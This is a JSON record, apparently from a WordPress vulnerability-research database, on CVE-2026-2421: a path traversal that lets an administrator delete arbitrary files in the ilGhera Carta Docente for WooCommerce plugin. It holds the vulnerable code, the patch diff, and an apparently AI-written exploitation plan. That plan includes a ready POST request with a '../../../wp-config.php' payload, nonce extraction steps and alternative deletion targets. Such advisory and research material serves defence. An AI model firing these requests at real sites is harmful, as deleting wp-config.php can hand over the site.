[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f0DD9GAEZgDiJzcNNIlO4DiUarOnXFcicKx6mswEFkh8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-2421","ilghera-carta-docente-for-woocommerce-authenticated-administrator-path-traversal-to-arbitrary-file-deletion-via-cert-par","ilGhera Carta Docente for WooCommerce \u003C= 1.5.0 - Authenticated (Administrator+) Path Traversal to Arbitrary File Deletion via 'cert' Parameter","The ilGhera Carta Docente for WooCommerce plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.5.0 via the 'cert' parameter of the 'wccd-delete-certificate' AJAX action. This is due to insufficient file path validation before performing a file deletion. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, such as wp-config.php, which can make site takeover and remote code execution possible.","wc-carta-docente",null,"\u003C=1.5.0","1.5.1","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:H","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-03-19 20:03:09","2026-03-20 08:26:02",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7aab1307-7fb5-46fb-ae12-087dce3086fc?source=api-prod",1,[22,23,24],"includes\u002Fclass-wccd-admin.php","readme.txt","wc-carta-docente.php","researched",false,3,"# Vulnerability Research Plan: CVE-2026-2421 - Arbitrary File Deletion in ilGhera Carta Docente for WooCommerce\n\n## 1. Vulnerability Summary\nThe **ilGhera Carta Docente for WooCommerce** plugin (versions \u003C= 1.5.0) contains a path traversal vulnerability in its certificate deletion functionality. Specifically, the `delete_certificate_callback` function in `includes\u002Fclass-wccd-admin.php` takes a filename from the `cert` POST parameter and concatenates it with a base directory constant (`WCCD_PRIVATE`) before passing it directly to `unlink()`. \n\nWhile the input is passed through `sanitize_text_field()`, this WordPress function does not remove directory traversal sequences (e.g., `..\u002F`). An authenticated Administrator can exploit this to delete any file the PHP process has permission to remove, including the critical `wp-config.php` file.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `wccd-delete-certificate`\n*   **Vulnerable Parameter:** `cert` (POST)\n*   **Required Parameters:**\n    *   `action`: `wccd-delete-certificate`\n    *   `wccd-delete`: (Any value, must be set)\n    *   `delete-nonce`: (Valid CSRF nonce for action `wccd-del-cert-nonce`)\n    *   `cert`: Path traversal payload (e.g., `..\u002F..\u002F..\u002Fwp-config.php`)\n*   **Authentication Level:** Administrator (`manage_options` capability is required to access the settings page where the nonce is generated, and the AJAX action is registered within the `WCCD_Admin` class).\n*   **Preconditions:** The plugin must be active. WooCommerce must be active.\n\n## 3. Code Flow\n1.  **Entry Point:** In `includes\u002Fclass-wccd-admin.php`, the `__construct()` method registers the AJAX action:\n    ```php\n    add_action( 'wp_ajax_wccd-delete-certificate', array( $this, 'delete_certificate_callback' ), 1 );\n    ```\n2.  **Logic Trigger:** The function `delete_certificate_callback()` is invoked.\n3.  **Nonce Check:** The code verifies a nonce named `wccd-del-cert-nonce` passed via `delete-nonce`:\n    ```php\n    if ( isset( $_POST['wccd-delete'], $_POST['delete-nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['delete-nonce'] ) ), 'wccd-del-cert-nonce' ) ) {\n    ```\n4.  **Input Acquisition:** The `cert` parameter is retrieved:\n    ```php\n    $cert = isset( $_POST['cert'] ) ? sanitize_text_field( wp_unslash( $_POST['cert'] ) ) : '';\n    ```\n5.  **Vulnerable Sink:** If `$cert` is not empty, it is concatenated with `WCCD_PRIVATE` and deleted:\n    ```php\n    unlink( WCCD_PRIVATE . $cert );\n    ```\n6.  **Path Resolution:** `WCCD_PRIVATE` is defined in `wc-carta-docente.php` relative to the WordPress uploads directory: `wp-content\u002Fuploads\u002Fwccd-private\u002F`. Traversal starts here.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is localized specifically for the plugin's settings page in the WordPress admin dashboard.\n\n1.  **Navigate to the Settings Page:** The plugin registers its settings page at `admin.php?page=wccd-settings` (as a submenu of `woocommerce`).\n2.  **Extracting the Nonce:** The nonce is passed to the frontend using `wp_localize_script()` in `wc-carta-docente.php`:\n    ```php\n    wp_localize_script(\n        'wccd-admin-scripts',\n        'wccdData',\n        array(\n            'delCertNonce' => $delete_nonce,\n            'addCatNonce'  => $add_cat_nonce,\n        )\n    );\n    ```\n3.  **Browser Execution:** \n    *   Use `browser_navigate` to go to `\u002Fwp-admin\u002Fadmin.php?page=wccd-settings`.\n    *   Use `browser_eval` to extract the nonce: `window.wccdData?.delCertNonce`.\n\n## 5. Exploitation Strategy\nThe goal is to delete `wp-config.php` to force WordPress into a setup state, or simply to demonstrate arbitrary file deletion.\n\n1.  **Setup User:** Create an Administrator user (if not already logged in).\n2.  **Get Nonce:** Follow the strategy in Section 4 to obtain a valid `delCertNonce`.\n3.  **Determine Traversal Depth:** \n    *   `WCCD_PRIVATE` is `wp-content\u002Fuploads\u002Fwccd-private\u002F`.\n    *   To reach root (where `wp-config.php` resides), the traversal is: `..\u002F..\u002F..\u002Fwp-config.php`.\n    *   `wccd-private\u002F` -> `..` -> `uploads\u002F` -> `..` -> `wp-content\u002F` -> `..` -> root.\n4.  **Send Exploitation Request:**\n    *   **Tool:** `http_request`\n    *   **Method:** POST\n    *   **URL:** `[TARGET_URL]\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Body (URL-encoded):**\n        ```\n        action=wccd-delete-certificate&wccd-delete=1&delete-nonce=[NONCE]&cert=..\u002F..\u002F..\u002Fwp-config.php\n        ```\n    *   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n\n## 6. Test Data Setup\n1.  **Plugin Activation:** Ensure `wc-carta-docente` and `woocommerce` are installed and activated.\n2.  **Target File:** Ensure `wp-config.php` exists (standard for WP) or create a canary file for safer testing:\n    *   `wp eval \"file_put_contents(ABSPATH . 'canary.txt', 'pwned');\"`\n3.  **Traversal to Canary:** If using `canary.txt`, the `cert` parameter should be `..\u002F..\u002F..\u002Fcanary.txt`.\n\n## 7. Expected Results\n*   The AJAX request will likely return a `200 OK` or `0` (as it calls `exit;` immediately after processing).\n*   The target file (e.g., `wp-config.php` or `canary.txt`) will be removed from the server filesystem.\n*   If `wp-config.php` is deleted, navigating to the homepage will redirect to `wp-admin\u002Fsetup-config.php`.\n\n## 8. Verification Steps\n1.  **Check Filesystem:** Use WP-CLI to check if the file still exists.\n    *   `wp eval \"echo file_exists(ABSPATH . 'canary.txt') ? 'exists' : 'deleted';\"`\n    *   Or check `wp-config.php`: `ls \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-config.php` (if in a shell).\n2.  **Check Site State:** Attempt to access the site; a missing `wp-config.php` triggers the WordPress installation screen.\n\n## 9. Alternative Approaches\n*   **Deletion of .htaccess:** If `wp-config.php` is protected by filesystem permissions, try deleting `.htaccess` (`..\u002F..\u002F..\u002F.htaccess`) to break site routing.\n*   **Plugin Deletion:** Delete the main plugin file to disable security checks: `..\u002F..\u002Fwc-carta-docente.php`.\n*   **WCCD_PRIVATE Discovery:** If the standard traversal depth fails, it may be because the uploads folder is moved. Verify the constant value:\n    *   `wp eval \"echo WCCD_PRIVATE;\"` to confirm the starting directory.","The ilGhera Carta Docente for WooCommerce plugin is vulnerable to arbitrary file deletion due to a path traversal flaw in its certificate management logic. An authenticated Administrator can use directory traversal sequences like '..\u002F..\u002F' in the 'cert' parameter to delete critical server files such as wp-config.php, potentially leading to site takeover.","\u002F\u002F includes\u002Fclass-wccd-admin.php @ 1.5.0\n\t\u002F**\n\t * Cancella il certificato\n\t *\n\t * @return void\n\t *\u002F\n\tpublic function delete_certificate_callback() {\n\n\t\tif ( isset( $_POST['wccd-delete'], $_POST['delete-nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['delete-nonce'] ) ), 'wccd-del-cert-nonce' ) ) {\n\n\t\t\t$cert = isset( $_POST['cert'] ) ? sanitize_text_field( wp_unslash( $_POST['cert'] ) ) : '';\n\n\t\t\tif ( $cert ) {\n\n\t\t\t\tunlink( WCCD_PRIVATE . $cert );\n\n\t\t\t}\n\t\t}\n\n\t\texit;\n\n\t}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.0\u002Fincludes\u002Fclass-wccd-admin.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.1\u002Fincludes\u002Fclass-wccd-admin.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.0\u002Fincludes\u002Fclass-wccd-admin.php\t2026-02-04 10:12:24.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.1\u002Fincludes\u002Fclass-wccd-admin.php\t2026-03-13 07:32:12.000000000 +0000\n@@ -81,11 +81,15 @@\n \n \t\tif ( isset( $_POST['wccd-delete'], $_POST['delete-nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['delete-nonce'] ) ), 'wccd-del-cert-nonce' ) ) {\n \n-\t\t\t$cert = isset( $_POST['cert'] ) ? sanitize_text_field( wp_unslash( $_POST['cert'] ) ) : '';\n+\t\t\t$cert = isset( $_POST['cert'] ) ? sanitize_file_name( wp_unslash( $_POST['cert'] ) ) : '';\n \n \t\t\tif ( $cert ) {\n \n-\t\t\t\tunlink( WCCD_PRIVATE . $cert );\n+\t\t\t\t$file_path = realpath( WCCD_PRIVATE . $cert );\n+\n+\t\t\t\tif ( $file_path && 0 === strpos( $file_path, realpath( WCCD_PRIVATE ) ) ) {\n+\t\t\t\t\tunlink( $file_path );\n+\t\t\t\t}\n \n \t\t\t}\n \t\t}\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.0\u002Freadme.txt \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.1\u002Freadme.txt\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.0\u002Freadme.txt\t2026-02-04 10:12:24.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.1\u002Freadme.txt\t2026-03-13 07:32:12.000000000 +0000\n@@ -1,7 +1,7 @@\n === ilGhera Carta Docente for WooCommerce ===\n Contributors: ghera74\n Tags: WooCommerce, payment gateway, Carta Docente, Carte Cultura, 18app\n-Stable tag: 1.5.0\n+Stable tag: 1.5.1\n Requires at least: 4.0\n Tested up to: 6.9\n License: GPLv3\n@@ -76,6 +76,11 @@\n \n == Changelog ==\n \n+= 1.5.1 =\n+Data di rilascio: 13 Marzo, 2026\n+\n+    * Sicurezza: Corretto path traversal nella cancellazione certificato (CVE-2026-2421)\n+\n = 1.5.0 =\n Data di rilascio: 4 Febbraio, 2026\n \ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.0\u002Fwc-carta-docente.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.1\u002Fwc-carta-docente.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.0\u002Fwc-carta-docente.php\t2026-02-04 10:12:24.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.1\u002Fwc-carta-docente.php\t2026-03-13 07:32:12.000000000 +0000\n@@ -6,8 +6,8 @@\n  * Author: ilGhera\n  *\n  * @package wc-carta-docente\n- * Version: 1.5.0\n- * Stable tag: 1.5.0\n+ * Version: 1.5.1\n+ * Stable tag: 1.5.1\n  * Author URI: https:\u002F\u002Filghera.com\n  * Requires at least: 4.0\n  * Tested up to: 6.9\n@@ -33,7 +33,7 @@\n \tdefine( 'WCCD_URI', plugin_dir_url( __FILE__ ) );\n \tdefine( 'WCCD_INCLUDES', WCCD_DIR . 'includes\u002F' );\n \tdefine( 'WCCD_INCLUDES_URI', WCCD_URI . 'includes\u002F' );\n-\tdefine( 'WCCD_VERSION', '1.5.0' );\n+\tdefine( 'WCCD_VERSION', '1.5.1' );\n \n \t\u002F*Main directory di upload*\u002F\n \t$wp_upload_dir = wp_upload_dir();","The exploit targets the 'wccd-delete-certificate' AJAX action. An authenticated Administrator first retrieves a valid CSRF nonce ('wccd-del-cert-nonce') from the plugin's settings page by accessing the localized 'wccdData' object in the browser. Using this nonce, the attacker sends a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the 'action' set to 'wccd-delete-certificate' and the 'cert' parameter containing a directory traversal payload (e.g., '..\u002F..\u002F..\u002Fwp-config.php'). Because the plugin fails to validate that the resulting path is contained within the intended directory before calling unlink(), the targeted file is deleted from the filesystem.","gemini-3-flash-preview","2026-04-18 02:15:19","2026-04-18 02:15:40",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","1.5.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-carta-docente\u002Ftags\u002F1.5.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwc-carta-docente.1.5.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-carta-docente\u002Ftags\u002F1.5.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwc-carta-docente.1.5.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-carta-docente\u002Ftags"]